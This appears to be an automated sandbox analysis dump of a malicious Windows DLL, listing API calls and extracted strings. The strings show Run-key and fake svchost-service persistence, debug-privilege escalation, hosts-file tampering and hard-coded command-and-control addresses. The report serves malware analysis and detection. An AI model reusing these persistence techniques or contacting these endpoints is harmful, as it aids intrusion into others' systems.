                                                        • svchsot.exe, xrefs: 1000BAC8
                                                        Similarity
                                                        • API ID: CloseInfoOpenQuerySleep
                                                        • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$svchsot.exe
                                                        APIs
                                                        • WSAStartup.WS2_32(00000202), ref: 10008E24
                                                          • Part of subcall function 100048E0: CreateMutexA.KERNEL32(?,?,?,10008E45), ref: 100048EF
                                                        • GetLastError.KERNEL32 ref: 10008E4A
                                                        • CreateThread.KERNEL32(00000000,00000000,10008AC0,?,00000000,00000000), ref: 10008E70
                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10008E77
                                                        • CloseHandle.KERNEL32(00000000), ref: 10008E7A
                                                        • Sleep.KERNEL32(00002710), ref: 10008E85
                                                        • CloseHandle.KERNEL32(00000000), ref: 10008E8E
                                                        Similarity
                                                        • API ID: CloseCreateHandle$ErrorLastMutexObjectSingleSleepStartupThreadWait
                                                        • String ID:
                                                        APIs
                                                        Strings
                                                        • http://107.163.241.204:12354/show.php, xrefs: 100095A3
                                                        Similarity
                                                        • API ID: Sleep$wsprintf
                                                        • String ID: http://107.163.241.204:12354/show.php
                                                        APIs
                                                        Similarity
                                                        • API ID: _inittermfreemalloc
                                                        • String ID:
                                                        APIs
                                                        • GetProcAddress.KERNEL32(6DFB0000,00000000), ref: 100025A4
                                                        Strings
                                                        • TmV0TG9jYWxHcm91cEVudW0=, xrefs: 10002590
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID: TmV0TG9jYWxHcm91cEVudW0=
                                                        APIs
                                                        • GetProcAddress.KERNEL32(6DFB0000,00000000), ref: 10002664
                                                        Strings
                                                        • TmV0QXBpQnVmZmVyRnJlZQ==, xrefs: 10002650
                                                        Similarity
                                                        • API ID: AddressProc
                                                        • String ID: TmV0QXBpQnVmZmVyRnJlZQ==
                                                        APIs
                                                        • lstrcpy.KERNEL32(00000000,00000001), ref: 10001155
                                                        Strings
                                                        Similarity
                                                        • API ID: lstrcpy
                                                        • String ID: VUUU
                                                        APIs
                                                          • Part of subcall function 1000B0A0: lstrcpy.KERNEL32(?,?), ref: 1000B0D9
                                                          • Part of subcall function 1000B0A0: lstrcat.KERNEL32(?,10019BE4), ref: 1000B0F2
                                                          • Part of subcall function 1000B0A0: lstrcat.KERNEL32(?,*.*), ref: 1000B101
                                                          • Part of subcall function 1000B0A0: FindFirstFileA.KERNEL32(?,?,?,1000B62C,?), ref: 1000B113
                                                        • Sleep.KERNEL32(0036EE80), ref: 1000B686
                                                        Strings
                                                        Similarity
                                                        • API ID: lstrcat$FileFindFirstSleeplstrcpy
                                                        • String ID: C:\Program Files
                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,00001000,00000004,?,?), ref: 00F30FD3
                                                        • VirtualProtect.KERNEL32(?,00001000,?,?), ref: 00F30FF1
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3803214756.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_f30000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        APIs
                                                        • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00F3007E
                                                        • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 00F300BE
                                                        Similarity
                                                        • API ID: Virtual$AllocFree
                                                        • String ID:
                                                        APIs
                                                        • RegCreateKeyExA.KERNEL32(?,?,?,?,?,?,?,?,?,100090BE,80000001,00000000,?), ref: 10004C4D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Create
                                                        • String ID:
                                                        APIs
                                                        • CreateFileA.KERNEL32(00000003,00000003,00000003,00000003,00000003,40000000,?,1000BBE4,c:\ftelcs\ReadMe.txt,40000000,00000003,00000000,00000004,00000080,00000000), ref: 10004B63
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        APIs
                                                        • RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,76F90F10,?,1000AAC6,?,76F90F10,00000000,000000FF,?,00000104,?,?,?), ref: 10004C8E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: QueryValue
                                                        • String ID:
                                                        • API String ID: 3660427363-0
                                                        APIs
                                                        • RegSetValueExA.KERNEL32(?,?,?,?,?,?,10009112,?,EvtMgr,00000000,00000001,?), ref: 10004CDE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Value
                                                        • String ID:
                                                        • API String ID: 3702945584-0
                                                        APIs
                                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,?,00000000), ref: 1000497E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: InternetOpen
                                                        • String ID:
                                                        • API String ID: 2038078732-0
                                                        APIs
                                                        • RegOpenKeyExA.KERNEL32(?,?,?,?,00020019,1000AA61,80000002,1000B947,00000000,00020019,?,?,?,76F90F00), ref: 10004CB9
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        APIs
                                                        • InternetOpenA.WININET(?,?,?,?,?), ref: 10004959
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: InternetOpen
                                                        • String ID:
                                                        • API String ID: 2038078732-0
                                                        APIs
                                                        • SetFilePointer.KERNEL32(00000080,00000080,00000004,00000000,1000BBF2,00000000,00000000,00000000,00000002,c:\ftelcs\ReadMe.txt,40000000,00000003,00000000,00000004,00000080,00000000), ref: 10004A94
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        APIs
                                                        • CreateMutexA.KERNEL32(?,?,?,10008E45), ref: 100048EF
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: CreateMutex
                                                        • String ID:
                                                        • API String ID: 1964310414-0
                                                        APIs
                                                        • GetShortPathNameA.KERNEL32(?,?,?), ref: 10004B1F
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: NamePathShort
                                                        • String ID:
                                                        • API String ID: 1295925010-0
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(04794068), ref: 100014B6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(04793060), ref: 100014E6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        APIs
                                                        • Process32First.KERNEL32(00000000,00000000), ref: 10004D1A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: FirstProcess32
                                                        • String ID:
                                                        • API String ID: 2623510744-0
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(04791050), ref: 10001546
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        APIs
                                                        • Process32Next.KERNEL32(?,00000000), ref: 10004D3A
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: NextProcess32
                                                        • String ID:
                                                        • API String ID: 1850201408-0
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(00FAD050), ref: 100015A6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(00FAA038), ref: 10001636
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(00FA7020), ref: 100016C6
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(00FA5010), ref: 10001726
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        APIs
                                                        • RegCloseKey.KERNEL32(1000AB02,1000AE3A,80000002,1000AB02,?,?,?,?,76F90F00), ref: 10004C65
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: gethostbyname
                                                        • String ID:
                                                        • API String ID: 930432418-0
                                                        APIs
                                                        • PathFileExistsA.SHLWAPI(?,1000BB9A,c:\ftelcs\ReadMe.txt,SeDebugPrivilege,00000001), ref: 10004A15
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID:
                                                        • API String ID: 1174141254-0
                                                        APIs
                                                        • GetDriveTypeA.KERNEL32(10019D40,1000B666,10019D40), ref: 10004B35
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        APIs
                                                        • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 00F300BE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3803214756.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_f30000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: FreeVirtual
                                                        • String ID:
                                                        • API String ID: 1263568516-0
                                                        APIs
                                                        • strrchr.MSVCRT ref: 1000615E
                                                        • strncpy.MSVCRT ref: 10006175
                                                        • strncpy.MSVCRT ref: 1000617F
                                                        • GetSystemInfo.KERNEL32(?), ref: 10006189
                                                        • GetCurrentProcess.KERNEL32(00000020,?), ref: 100061AA
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 100061B1
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 100061C2
                                                        • AdjustTokenPrivileges.ADVAPI32 ref: 100061F7
                                                        • CloseHandle.KERNEL32(00000010), ref: 10006202
                                                        • sscanf.MSVCRT ref: 1000622D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ProcessTokenstrncpy$AdjustCloseCurrentHandleInfoLookupOpenPrivilegePrivilegesSystemValuesscanfstrrchr
                                                        • String ID: %[^$SeDebugPrivilege$c:\ftelcs$etc\hosts
                                                        • API String ID: 3677170833-2241817278
                                                        APIs
                                                        • wcscat.MSVCRT ref: 10005B73
                                                        • InterlockedDecrement.KERNEL32(00000008), ref: 10005E38
                                                        • _strcmpi.MSVCRT ref: 10005E55
                                                        • InterlockedDecrement.KERNEL32(00000008), ref: 10005F59
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: DecrementInterlocked$_strcmpiwcscat
                                                        • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$svchost.exe$svchost.exe -k NetworkService
                                                        • API String ID: 1133782235-2685825574
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Versionsprintf
                                                        • String ID: 2000$2003$2008$Vista$Win %s SP%d
                                                        • API String ID: 1728264858-2264339393
                                                        APIs
                                                        • FindFirstFileA.KERNEL32(?,?), ref: 10005333
                                                        • wsprintfA.USER32 ref: 1000537B
                                                        • FindNextFileA.KERNEL32(?,?,?,?,?,00000000,?,?,00000000), ref: 100053E8
                                                        • FindClose.KERNEL32(?,?,?,?,00000000,?,?,00000000), ref: 100053FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNextwsprintf
                                                        • String ID: %s\%s$.$\*.*
                                                        • API String ID: 180737720-2210278135
                                                        APIs
                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,00000000,100071DE), ref: 10004BAE
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        APIs
                                                        • ExitWindowsEx.USER32(?,00000000), ref: 100049FA
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ExitWindows
                                                        • String ID:
                                                        • API String ID: 1089080001-0
                                                        APIs
                                                        Strings
                                                        • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 100083AA
                                                        • ServiceDll, xrefs: 1000835D
                                                        • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 1000830D
                                                        • RegOpenKeyEx(Svchost), xrefs: 100083F4
                                                        • %SystemRoot%\System32\svchost.exe -k , xrefs: 100081C5
                                                        • RegSetValueEx(Svchost\krnlsrvc), xrefs: 10008431
                                                        • SYSTEM\CurrentControlSet\Services\%s, xrefs: 100082B7
                                                        • RegSetValueEx(ServiceDll), xrefs: 1000837F
                                                        • Description, xrefs: 100082EB
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID: %SystemRoot%\System32\svchost.exe -k $Description$RegOpenKeyEx(Svchost)$RegSetValueEx(ServiceDll)$RegSetValueEx(Svchost\krnlsrvc)$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                        • API String ID: 1452528299-660433390
                                                        APIs
                                                        Strings
                                                        • c:\windows\system32\drivers\%s\%s, xrefs: 10006497
                                                        • %s\%s, xrefs: 1000640B
                                                        • c:\windows\system32\drivers\etc\%c%c%c.%c%c%c, xrefs: 1000656F
                                                        • c:\windows\system32\drivers\%s, xrefs: 1000647E
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: rand$wsprintf$CreateFile$CloseDeleteDirectoryHandleMemoryProcessSleepWritesrandtime
                                                        • String ID: %s\%s$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s$c:\windows\system32\drivers\etc\%c%c%c.%c%c%c
                                                        • API String ID: 3377497938-1917988604
                                                        APIs
                                                        • wsprintfA.USER32 ref: 10006ACE
                                                        • GetModuleFileNameA.KERNEL32(00000000,c:\windows\SysWOW64\rundll32.exe,00000104,1000BB2D), ref: 10006AE5
                                                        • GetModuleFileNameA.KERNEL32(10000000,c:\ftelcs\rjqzr.dll,00000104), ref: 10006AF7
                                                        • strrchr.MSVCRT ref: 10006B25
                                                        • wsprintfA.USER32 ref: 10006B3D
                                                        • wsprintfA.USER32 ref: 10006B4E
                                                        • wsprintfA.USER32 ref: 10006B5F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: wsprintf$FileModuleName$strrchr
                                                        • String ID: %s.txt$%s\ReadMe.txt$%s\version.txt$09161305$09161305.txt$ECF4BB45F69D$M%s$Mkrnaver.com:6520$c:\ftelcs$c:\ftelcs\ReadMe.txt$c:\ftelcs\rjqzr.dll$c:\ftelcs\version.txt$c:\windows\SysWOW64\rundll32.exe$krnaver.com:6520
                                                        • API String ID: 1444062329-90664482
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3817571933.0000000010001000.00000040.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                        • Associated: 00000006.00000002.3817538970.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                        • Associated: 00000006.00000002.3817618583.000000001001E000.00000040.00000001.01000000.00000005.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                        Similarity
                                                        • API ID: _mbsicmp
                                                        • String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
                                                        • API String ID: 1961004622-51310709
                                                        APIs
                                                        • GetCurrentProcessId.KERNEL32 ref: 10005069
                                                          • Part of subcall function 10004DA0: CreateFileA.KERNEL32(?,10000000,00000007,00000000,00000004,00000080,00000000), ref: 10004E62
